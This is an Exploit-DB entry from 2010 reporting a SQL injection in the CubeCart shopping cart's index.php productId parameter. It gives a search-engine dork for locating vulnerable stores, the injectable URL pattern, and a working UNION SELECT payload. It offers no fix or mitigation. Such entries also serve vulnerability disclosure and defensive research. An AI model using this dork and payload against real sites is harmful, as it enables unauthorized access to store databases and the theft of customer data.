CubeCart index.php SQL Injection Vulnerability

2010-02-18T00:00:00
ID EDB-ID:11495
Type exploitdb
Reporter AtT4CKxT3rR0r1ST
Modified 2010-02-18T00:00:00

Description

CubeCart (index.php) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            CubeCart (index.php) Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : http://www.cubecart.com/downloads/
.:. Dork           : "powered by CubeCart" inurl:"index.php?_a="

####################################################################

===[ Exploit ]===

www.site.com/index.php?_a=viewProd&productId=22[Sql  Sql Injection]

===[ Example ]===

http://server/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version()

####################################################################